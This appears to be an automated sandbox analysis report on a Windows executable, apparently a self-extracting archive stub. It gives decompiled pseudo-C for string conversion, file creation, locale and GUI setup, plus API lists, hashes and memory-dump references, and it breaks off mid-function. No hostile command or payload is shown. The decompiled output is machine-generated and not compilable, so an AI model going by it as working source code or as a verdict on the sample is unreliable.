0x00000000
0x00000000
0x0084c69d
0x0084c6ab
0x0084c6af
0x0084c51c
0x0084c520
0x0084c6c0
0x0084c6c4
0x0084c6c4
0x0084c6c9
0x0084c6cc
0x00000000
0x00000000
0x00000000
0x00000000
0x0084c520
0x0084c69d
0x0084c6a6
0x0084c518
0x00000000
0x0084c532
0x0084c532
0x0084c533
0x0084c536
0x00000000
0x0084c50f

APIs

ShellExecuteExW.SHELL32(000001C0), ref: 0084C5B5
ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 0084C5FA
GetExitCodeProcess.KERNEL32 ref: 0084C632
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0084C658
ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 0084C6E7

Part of subcall function 00841438: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0083ADA2,?,?,?,0083AD51,?,-00000002,?,00000000,?), ref: 0084144E

Strings

, xrefs: 0084C507
.exe, xrefs: 0084C662
.inf, xrefs: 0084C571

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
String ID: $.exe$.inf
API String ID: 3686203788-2452507128
Opcode ID: a0654ad77c89041f798b6bcdef0045aaea96774f57cf5bd4bad4eb1dc123290d
Instruction ID: 30cdaf77ca9127bfc5e61b22953425d9faab81fa3083fbe273efecccb3fdd8fd
Opcode Fuzzy Hash: a0654ad77c89041f798b6bcdef0045aaea96774f57cf5bd4bad4eb1dc123290d
Instruction Fuzzy Hash: 6B5102705063889BDB71AF24D940AABBBEDFFA5304F05580DE4C1D7190DBB19988CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00859600, Relevance: 9.2, APIs: 6, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00859600(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x86d668; // 0x14325215
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E0085DC0C(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E0084E243(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E00859868(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E00859CBF(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E00859868(_t101);
									goto L36;
								}
								_t62 = E00859CBF(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E00859868(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E00857B00(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E00860F30();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E00859CBF(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E00857B00(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00860F30();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x00859605
0x00859606
0x00859607
0x0085960e
0x00859612
0x00859613
0x00859619
0x0085961f
0x00859625
0x00859628
0x00859628
0x0085962b
0x0085962d
0x0085962d
0x0085962b
0x0085962f
0x00859634
0x0085963b
0x0085963e
0x0085963e
0x0085965a
0x00859660
0x00859665
0x008597f8
0x0085980b
0x0085966b
0x0085966b
0x0085966e
0x00859673
0x00859677
0x008596cb
0x008596cb
0x008596cd
0x008596cf
0x008597ed
0x008597ed
0x008597ef
0x008597f0
0x00000000
0x008597f6
0x008596e0
0x008596e6
0x008596e8
0x00000000
0x00000000
0x008596ee
0x00859700
0x00859705
0x00859709
0x00000000
0x00000000
0x00859716
0x00859750
0x00859753
0x00859756
0x00859758
0x0085975a
0x0085975c
0x008597a8
0x008597a8
0x008597aa
0x008597aa
0x008597ac
0x008597e6
0x008597e7
0x00000000
0x008597ec
0x008597c0
0x008597c5
0x008597c7
0x00000000
0x00000000
0x008597cb
0x008597cc
0x008597cd
0x008597d0
0x0085980c
0x0085980f
0x008597d2
0x008597d2
0x008597d3
0x008597d3
0x008597e0
0x008597e2
0x008597e4
0x00859815
0x00000000
0x00000000
0x00000000
0x00000000
0x008597e4
0x0085975e
0x00859761
0x00859763
0x00859765
0x00859767
0x0085976a
0x0085976f
0x0085978a
0x0085978c
0x00859796
0x00859798
0x00859799
0x0085979b
0x00000000
0x00000000
0x0085979d
0x008597a3
0x008597a3
0x00000000
0x008597a3
0x00859771
0x00859773
0x00859777
0x0085977c
0x0085977e
0x00859780
0x00000000
0x00000000
0x00859782
0x00000000
0x00859782
0x00859718
0x0085971d
0x00000000
0x00000000
0x00859723
0x00859725
0x00000000
0x00000000
0x0085973c
0x00859741
0x00859745
0x00000000
0x00000000
0x00000000
0x0085974b
0x0085967e
0x00859680
0x00859682
0x0085968a
0x008596a9
0x008596ab
0x008596b5
0x008596b7
0x008596b8
0x008596ba
0x00000000
0x00000000
0x008596c0
0x008596c6
0x008596c6
0x00000000
0x008596c6
0x0085968e
0x00859692
0x00859697
0x0085969b
0x00000000
0x00000000
0x008596a1
0x00000000
0x008596a1

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0085457B,0085457B,?,?,?,00859851,00000001,00000001,47E85006), ref: 0085965A
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00859851,00000001,00000001,47E85006,?,?,?), ref: 008596E0
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,47E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008597DA
__freea.LIBCMT ref: 008597E7

Part of subcall function 00857B00: RtlAllocateHeap.NTDLL(00000000,?,?,?,00853006,?,0000015D,?,?,?,?,008544E2,000000FF,00000000,?,?), ref: 00857B32

__freea.LIBCMT ref: 008597F0
__freea.LIBCMT ref: 00859815

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: a47d4700eceda4066532dbf719cd5f4969d521200f09c8acfe3e268b0bf4abfe
Instruction ID: a5dcf5464da58407ab92a75c8342e8e70e8a53ac200e3b0bd37cc62064d81051
Opcode Fuzzy Hash: a47d4700eceda4066532dbf719cd5f4969d521200f09c8acfe3e268b0bf4abfe
Instruction Fuzzy Hash: 6851F272620206EFDB258F78CC81EBB77AAFB48751F15422AFC44D6180EB34DC48C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 0083980C, Relevance: 7.6, APIs: 5, Instructions: 116
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0083980C(void* __ecx, void* __esi, struct _FILETIME _a4, signed int _a8, short _a12, WCHAR* _a4184, unsigned int _a4188) {
				long _v0;
				void* _t48;
				long _t59;
				unsigned int _t61;
				long _t64;
				signed int _t65;
				char _t68;
				void* _t72;
				void* _t74;
				long _t78;
				void* _t81;

				_t74 = __esi;
				E0084D9C0();
				_t61 = _a4188;
				_t72 = __ecx;
				 *(__ecx + 0x1020) =  *(__ecx + 0x1020) & 0x00000000;
				if( *((char*)(__ecx + 0x1d)) != 0 || (_t61 & 0x00000004) != 0) {
					_t68 = 1;
				} else {
					_t68 = 0;
				}
				_push(_t74);
				asm("sbb esi, esi");
				_t78 = ( ~(_t61 >> 0x00000001 & 1) & 0xc0000000) + 0x80000000;
				if((_t61 & 0x00000001) != 0) {
					_t78 = _t78 | 0x40000000;
				}
				_t64 =  !(_t61 >> 3) & 0x00000001;
				if(_t68 != 0) {
					_t64 = _t64 | 0x00000002;
				}
				_v0 = (0 |  *((intOrPtr*)(_t72 + 0x15)) != 0x00000000) - 0x00000001 & 0x08000000;
				E00836FEC( &_a12);
				if( *((char*)(_t72 + 0x1c)) != 0) {
					_t78 = _t78 | 0x00000100;
				}
				_t48 = CreateFileW(_a4184, _t78, _t64, 0, 3, _v0, 0); // executed
				_t81 = _t48;
				if(_t81 != 0xffffffff) {
					L17:
					if( *((char*)(_t72 + 0x1c)) != 0 && _t81 != 0xffffffff) {
						_a4.dwLowDateTime = _a4.dwLowDateTime | 0xffffffff;
						_a8 = _a8 | 0xffffffff;
						SetFileTime(_t81, 0,  &_a4, 0);
					}
					 *((char*)(_t72 + 0x12)) = 0;
					_t65 = _t64 & 0xffffff00 | _t81 != 0xffffffff;
					 *((intOrPtr*)(_t72 + 0xc)) = 0;
					 *((char*)(_t72 + 0x10)) = 0;
					if(_t81 != 0xffffffff) {
						 *(_t72 + 4) = _t81;
						E0083FAE7(_t72 + 0x1e, _a4184, 0x800);
					}
					return _t65;
				} else {
					_a4.dwLowDateTime = GetLastError();
					if(E0083B3C9(_a4184,  &_a12, 0x800) == 0) {
						L15:
						if(_a4.dwLowDateTime == 2) {
							 *((intOrPtr*)(_t72 + 0x1020)) = 1;
						}
						goto L17;
					}
					_t81 = CreateFileW( &_a12, _t78, _t64, 0, 3, _v0, 0);
					_t59 = GetLastError();
					if(_t59 == 2) {
						_a4.dwLowDateTime = _t59;
					}
					if(_t81 != 0xffffffff) {
						goto L17;
					} else {
						goto L15;
					}
				}
			}

0x0083980c
0x00839811
0x00839817
0x00839820
0x00839822
0x0083982d
0x00839838
0x00839834
0x00839834
0x00839834
0x0083983e
0x00839846
0x0083984e
0x00839857
0x00839859
0x00839859
0x00839864
0x00839869
0x0083986b
0x0083986b
0x00839880
0x00839884
0x0083988d
0x0083988f
0x0083988f
0x008398a8
0x008398ae
0x008398b3
0x00839917
0x0083991c
0x00839923
0x0083992c
0x00839937
0x00839937
0x00839942
0x00839945
0x00839948
0x0083994b
0x00839951
0x00839962
0x00839966
0x00839966
0x00839976
0x008398b5
0x008398bb
0x008398d7
0x00839906
0x0083990b
0x0083990d
0x0083990d
0x00000000
0x0083990b
0x008398f0
0x008398f2
0x008398fb
0x008398fd
0x008398fd
0x00839904
0x00000000
0x00000000
0x00000000
0x00000000
0x00839904

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,008377E5,?,00000005,?,00000011), ref: 008398A8
GetLastError.KERNEL32(?,?,008377E5,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008398B5
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,00000800,?,?,008377E5,?,00000005,?), ref: 008398EA
GetLastError.KERNEL32(?,?,008377E5,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008398F2
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,008377E5,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00839937

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 1fbbf7e5571da572f5e67a4a5032f71852da0dc2a55a670024b64003a261d66c
Instruction ID: 81c6c986d22075aa51ce2b1f7276ce0fb74297fc5cf8a3b52544a50d9fd43935
Opcode Fuzzy Hash: 1fbbf7e5571da572f5e67a4a5032f71852da0dc2a55a670024b64003a261d66c
Instruction Fuzzy Hash: 41413831844B566BE7209F248C05BDABBE4FB81324F100719F9E4D61D0D3F5A998CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 0085A70D, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0085A70D(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				char _v16;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t31;
				signed int _t36;
				char _t40;
				intOrPtr _t44;
				char _t45;
				signed int _t51;
				void* _t64;
				void* _t70;
				signed int _t75;
				void* _t81;

				_t81 = __eflags;
				_v8 = E00858571(__ebx, __ecx, __edx);
				E0085A82C(__ebx, __ecx, __edx, _t81);
				_t31 = E0085A4A1(_t81, _a4);
				_v16 = _t31;
				_t57 =  *(_v8 + 0x48);
				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_t70 = E00857B00(_t57, 0x220);
				_t51 = __ebx | 0xffffffff;
				__eflags = _t70;
				if(__eflags == 0) {
					L5:
					_t75 = _t51;
					goto L6;
				} else {
					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
					 *_t70 =  *_t70 & 0x00000000; // executed
					_t36 = E0085A8CE(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
					_t75 = _t36;
					__eflags = _t75 - _t51;
					if(_t75 != _t51) {
						__eflags = _a8;
						if(_a8 == 0) {
							E008578BD();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t51 == 1;
						if(_t51 == 1) {
							_t45 = _v8;
							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0x86db20;
							if( *((intOrPtr*)(_t45 + 0x48)) != 0x86db20) {
								E00857AC6( *((intOrPtr*)(_t45 + 0x48)));
							}
						}
						 *_t70 = 1;
						_t64 = _t70;
						_t70 = 0;
						 *(_v8 + 0x48) = _t64;
						_t40 = _v8;
						__eflags =  *(_t40 + 0x350) & 0x00000002;
						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0x86dda0 & 0x00000001;
							if(( *0x86dda0 & 0x00000001) == 0) {
								_v16 =  &_v8;
								E0085A377(5,  &_v16);
								__eflags = _a8;
								if(_a8 != 0) {
									_t44 =  *0x86dd40; // 0x5b22e8
									 *0x86d814 = _t44;
								}
							}
						}
						L6:
						E00857AC6(_t70);
						return _t75;
					} else {
						 *((intOrPtr*)(E00857F42())) = 0x16;
						goto L5;
					}
				}
			}

0x0085a70d
0x0085a71a
0x0085a71d
0x0085a725
0x0085a72e
0x0085a731
0x0085a737
0x00000000
0x0085a739
0x0085a73d
0x0085a74a
0x0085a74c
0x0085a750
0x0085a752
0x0085a782
0x0085a782
0x00000000
0x0085a754
0x0085a761
0x0085a767
0x0085a76a
0x0085a76f
0x0085a773
0x0085a775
0x0085a794
0x0085a798
0x0085a79a
0x0085a79a
0x0085a7a5
0x0085a7a9
0x0085a7aa
0x0085a7ac
0x0085a7af
0x0085a7b6
0x0085a7bb
0x0085a7c0
0x0085a7b6
0x0085a7c1
0x0085a7c7
0x0085a7cc
0x0085a7ce
0x0085a7d1
0x0085a7d4
0x0085a7db
0x0085a7dd
0x0085a7e4
0x0085a7e9
0x0085a7f2
0x0085a7f7
0x0085a7fd
0x0085a7ff
0x0085a804
0x0085a804
0x0085a7fd
0x0085a7e4
0x0085a784
0x0085a785
0x00000000
0x0085a777
0x0085a77c
0x00000000
0x0085a77c
0x0085a775

APIs

Part of subcall function 00858571: GetLastError.KERNEL32(?,008700E0,008533F4,008700E0,?,?,00852E6F,?,?,008700E0), ref: 00858575
Part of subcall function 00858571: _free.LIBCMT ref: 008585A8
Part of subcall function 00858571: SetLastError.KERNEL32(00000000,?,008700E0), ref: 008585E9
Part of subcall function 00858571: _abort.LIBCMT ref: 008585EF

Part of subcall function 0085A82C: _abort.LIBCMT ref: 0085A85E
Part of subcall function 0085A82C: _free.LIBCMT ref: 0085A892

Part of subcall function 0085A4A1: GetOEMCP.KERNEL32(00000000,?,?,0085A72A,?), ref: 0085A4CC

_free.LIBCMT ref: 0085A785
_free.LIBCMT ref: 0085A7BB

Strings

"[, xrefs: 0085A7FF
"[, xrefs: 0085A804

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast_abort
String ID: "[$"[
API String ID: 2991157371-1714955112
Opcode ID: f6c16f9be93e3988a8ecce0ea6c3aee6a1123b920c40a451aa1888b46ed3728f
Instruction ID: 11f0e120f8d096de5f0abf43cc5fe50ef2911b66ff69b37f17893b097566a9b9
Opcode Fuzzy Hash: f6c16f9be93e3988a8ecce0ea6c3aee6a1123b920c40a451aa1888b46ed3728f
Instruction Fuzzy Hash: 36310731904204AFDB14EB68D480BAD7BF5FF44322F2542A9ED14DB291DB715D08CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00849AA5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00849AA5(long _a4) {
				short _v164;
				long _t5;
				long _t6;
				WCHAR* _t9;
				long _t11;

				_t11 = _a4;
				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
				if(_t5 != 0) {
					_t9 = L"EDIT";
					_t5 = E00841438( &_v164, _t9);
					if(_t5 != 0) {
						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
						_t11 = _t5;
					}
				}
				if(_t11 != 0) {
					_t6 = SHAutoComplete(_t11, 0x10); // executed
					return _t6;
				}
				return _t5;
			}

0x00849ab5
0x00849abc
0x00849ac4
0x00849ac7
0x00849ad4
0x00849adb
0x00849ae3
0x00849ae9
0x00849ae9
0x00849aeb
0x00849aee
0x00849af3
0x00000000
0x00849af3
0x00849afd

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00849ABC
SHAutoComplete.SHLWAPI(?,00000010), ref: 00849AF3

Part of subcall function 00841438: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0083ADA2,?,?,?,0083AD51,?,-00000002,?,00000000,?), ref: 0084144E

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00849AE3

Strings

EDIT, xrefs: 00849AC7, 00849AD2, 00849ADF

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 294822f8e902e5b59e1c59deba56770ff6509e613eff33acb5b7006743e4b5a7
Instruction ID: c6ee2514eb0e327d7df1c95937a806f74a10269d9a095c77e0d2c38eabb94000
Opcode Fuzzy Hash: 294822f8e902e5b59e1c59deba56770ff6509e613eff33acb5b7006743e4b5a7
Instruction Fuzzy Hash: 35F05E32B4132C6BDB30D6599C09F9B766CEB46B11F450156FE40E2180DAA4994186F6

Uniqueness

Uniqueness Score: -1.00%

Function 00849B13, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
comCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00849B13(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t10;

				_t10 = E0083FD16(L"riched20.dll"); // executed
				 *__ecx = _t10;
				 *0x86dffc(0); // executed
				_v16 = 8;
				_v12 = 0x7ff;
				 *0x86deb4( &_v16);
				_v32 = 1;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				L0084D874(); // executed
				 *0x86df08(0x8775c0,  &_v8,  &_v32, 0); // executed
				return __ecx;
			}

0x00849b22
0x00849b29
0x00849b2c
0x00849b35
0x00849b3d
0x00849b44
0x00849b4e
0x00849b59
0x00849b5d
0x00849b60
0x00849b63
0x00849b6d
0x00849b7a

APIs

Part of subcall function 0083FD16: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0083FD31
Part of subcall function 0083FD16: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0083E82C,Crypt32.dll,?,0083E8AE,?,0083E892,?,?,?,?), ref: 0083FD53

OleInitialize.OLE32(00000000), ref: 00849B2C
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00849B63
SHGetMalloc.SHELL32(008775C0), ref: 00849B6D

Strings

riched20.dll, xrefs: 00849B1B

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: 590a193fedca860242f6dfce9182194fcedac2359bf0161dfc50a8dfd22759b8
Instruction ID: d00d3a8d4f526415e785e1c117c51311efdf039a0f6e7cd8849443868a817a63
Opcode Fuzzy Hash: 590a193fedca860242f6dfce9182194fcedac2359bf0161dfc50a8dfd22759b8
Instruction Fuzzy Hash: ACF0F9B1D00209ABCB10AF99D849AEFFBFCFF94705F00416AE815E2241DBB856058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0084C8E7, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E0084C8E7(void* __eflags, WCHAR* _a4) {
				char _v8196;
				int _t7;
				WCHAR* _t12;
				void* _t14;

				_t14 = __eflags;
				E0084D9C0();
				SetEnvironmentVariableW(L"sfxcmd", _a4); // executed
				_t7 = E0083F86B(_t14, _a4,  &_v8196, 0x1000);
				_t12 = _t7;
				if(_t12 != 0) {
					_push( *_t12 & 0x0000ffff);
					while(E0083F982() != 0) {
						_t12 =  &(_t12[1]);
						__eflags = _t12;
						_push( *_t12 & 0x0000ffff);
					}
					_t7 = SetEnvironmentVariableW(L"sfxpar", _t12); // executed
				}
				return _t7;
			}

0x0084c8e7
0x0084c8ef
0x0084c8fd
0x0084c912
0x0084c917
0x0084c91b
0x0084c920
0x0084c92a
0x0084c923
0x0084c923
0x0084c929
0x0084c929
0x0084c939
0x0084c939
0x0084c943

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0084C8FD
SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0084C939

Strings

sfxpar, xrefs: 0084C934
sfxcmd, xrefs: 0084C8F8

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 18146ee6f76ddfdd73334f46859712631dcd87401044b3ab0ea981e450546179
Instruction ID: 5f2a2f1ed1106b653047577e41aab1a5f7820b78a1f760bdb88730e7133a1c8d
Opcode Fuzzy Hash: 18146ee6f76ddfdd73334f46859712631dcd87401044b3ab0ea981e450546179
Instruction Fuzzy Hash: 64F0A772905228B6C7212F98DC09BAABF5CFF09B41F0104A5FE89D6242DB645D41C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 008396E2, Relevance: 6.1, APIs: 4, Instructions: 57
fileCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E008396E2(void* __ecx, void* _a4, long _a8) {
				long _v8;
				int _t14;
				signed int _t15;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
					 *(_t25 + 4) = GetStdHandle(0xfffffff6);
				}
